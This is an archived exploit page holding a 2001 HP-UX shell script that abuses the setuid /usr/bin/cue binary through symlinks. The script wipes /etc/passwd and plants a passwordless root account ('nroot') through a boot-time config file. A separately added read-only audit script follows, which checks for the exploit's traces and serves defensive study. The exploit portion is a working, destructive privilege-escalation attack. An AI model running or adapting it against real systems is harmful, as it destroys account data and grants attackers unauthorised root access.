cue.sh

Date: 08 Jun 2001 00:00:00
Reported by: Emilie Chang
Type: packetstorm
Source: packetstormsecurity.com

Dangerous script for proof of concept. Requires careful code review before execution.


Code
`#!/usr/bin/ksh  
  
##  
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!  
##  
## This is just a proof of concept. Don't use for malicious  
## purpose. If ever you decide to run that script, please  
## read the code carefully before!  
##  
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT  
## people. Good job sweethearts.  
##  
## Old-styled exploit, tested on HPUX 10.20, model 899  
## Warning : /usr/bin/cue exists on HPUX 800 models only  
##  
## Let's test the model by the way...  
##  
  
MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`  
export MODEL  
  
if [ $MODEL -lt 800 -o $MODEL -gt 899 ]  
then  
echo "Your host doesn't look like a HPuX 8** model, stopping now."  
exit  
fi  
  
##  
## Test whether /usr/bin/cue exists or not...  
##  
  
if [ ! -u /usr/bin/cue ]  
then  
echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."  
exit  
fi  
  
##  
## Well you passed the above tests. Going on playing.  
## Creating a file within /etc/rc.config.d : It will  
## be executed at next reboot (which might happen  
## soon)  
##  
  
TTY=`tty | awk -F '/' '{print $3}'`  
export TTY  
  
TERM=whatevah  
export TERM  
  
umask 000  
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY  
/usr/bin/cue > /dev/null 2> /dev/null  
  
##  
## Inserting evil root account within /etc/passwd  
##  
  
echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit  
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit  
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit  
  
##  
## Now saving the passwd file, which we are about to empty  
##   
  
cp /etc/passwd /tmp/passwd  
  
##  
## passwd file destruction  
## (SOMEONE SET US UP THE BOMB !!)  
##  
  
rm IDMERROR.$TTY  
ln -s /etc/passwd IDMERROR.$TTY  
/usr/bin/cue > /dev/null 2> /dev/null  
  
##  
## *POOF*, now that the /etc/passwd file is emptied, admin  
## MUST reboot to get things done.  
##  
  
echo "Your nroot account will be created within /etc/passwd"  
echo "with no password. Remove it asap, it's just a proof"  
echo "of concept!"  
  
# The end.  
`
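Added example, not part of the original page or the author's script: a read-only audit for the traces the script above describes leaving behind (an IDMERROR.<tty> symlink in the working directory, a file under /etc/rc.config.d that an unprivileged user can append to, and a UID 0 passwd entry with an empty password field). The function names and the --audit switch are illustrative; the world-writable check assumes that a file the script could append to without privileges was left writable by others.

```shell
#!/bin/sh
# Added audit example (illustrative names; nothing here is from the original script).
# Every check only reads the filesystem.

# Print the login name of each UID 0 account whose password field is empty,
# e.g. an entry of the form "nroot::0:3:n:/:/sbin/sh".
empty_pw_root() {
    awk -F: '$3 == 0 && $2 == "" { print $1 }' "$1"
}

# List IDMERROR.* entries in directory $1 that are symbolic links.
# ls -ld prints "name -> target", so the file being pointed at is visible.
idmerror_links() {
    for f in "$1"/IDMERROR.*; do
        if [ -L "$f" ]; then
            ls -ld "$f"
        fi
    done
    return 0
}

# Print regular files under directory $1 that are writable by "other".
# Assumption: startup configuration files should never carry that bit.
world_writable() {
    find "$1" -type f -perm -002 -print
}

# Run all three checks against the live system only when asked to.
if [ "${1:-}" = "--audit" ]; then
    echo "UID 0 accounts with an empty password field:"
    empty_pw_root /etc/passwd
    echo "IDMERROR.* symlinks in /tmp and the current directory:"
    idmerror_links /tmp
    idmerror_links .
    echo "World-writable files under /etc/rc.config.d:"
    world_writable /etc/rc.config.d
fi
```

Any output from the second or third check on a host that ships /usr/bin/cue is worth comparing against the file's expected owner, mode and contents before the next reboot.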
